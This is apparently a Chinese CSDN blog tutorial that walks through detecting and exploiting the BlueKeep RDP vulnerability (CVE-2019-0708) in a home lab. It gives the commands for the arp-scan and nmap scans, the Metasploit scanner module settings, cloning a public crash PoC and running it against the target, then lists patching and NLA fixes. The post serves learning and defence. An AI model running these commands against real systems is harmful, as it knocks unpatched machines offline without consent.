cve-2019-07-08

该博客详细介绍了CVE-2019-0708(BlueKeep)漏洞的影响系统版本、测试环境、漏洞检测方法以及利用过程。通过nmap扫描和Metasploit框架进行端口探测和漏洞验证,并提供了利用POC的下载及攻击步骤。同时,给出了漏洞修复建议,包括打补丁、关闭端口和启用NLA。
摘要由CSDN通过智能技术生成

cve-2019-07-08——RDP漏洞利用

一、影响的系统版本

(1)Window2003
(2)Window2008
(3)Window2008 R2
(4)Window xp
(5)Window7

二、测试环境

kali ip:192.168.158.130
靶机ip:192.168.158.139
靶机搭建,请参考我的另一篇博客
https://blog.csdn.net/m_de_g/article/details/119957223?spm=1001.2014.3001.5501

三、思路

1.内网端口扫描

arp-scan -l

在这里插入图片描述

得到靶机的IP:192.168.158.139

2.nmap扫描查看靶机开放的端口

nmap -sS 192.168.158.139

在这里插入图片描述
发现靶机开放了3389端口

3.启动msf

msfconsole

在这里插入图片描述
4.查找能力利用0708的攻击模块

search 0708

在这里插入图片描述
5.选择合适的攻击模块

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

在这里插入图片描述

6.查看需要设置的参数

show options 

在这里插入图片描述
7.发现了没有设置好攻击目标的IP

set rhosts 192.168.158.139

在这里插入图片描述
8.设置好参数之后,执行run
在这里插入图片描述
9.发现目标主机存在0708的漏洞,可以进行攻击

四、漏洞攻击

1.因为kali没有pip3,所以我们在使用前应当先安装pip3,再安装impacket库

apt-get install python3-pip
pip3 install impacket

2.下载POC

git clone https://github.com/n1xbyte/CVE-2019-0708.git
cd CVE-2019-0708

3.进行攻击

python3 crashpoc.py 192.168.158.139 64         //后面的64是版本号

在这里插入图片描述

在这里插入图片描述

五、漏洞修复

(1)及时打对应系统的安全补丁
(2)关闭3389端口或添加防火墙安全策略限制对3389端口的访问
(3)打不了补丁的可以开启远程桌面(网络级别身份验证(NLA)),可以临时防止漏洞攻击

六、参考链接

https://blog.csdn.net/weixin_44677409/article/details/94552370

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值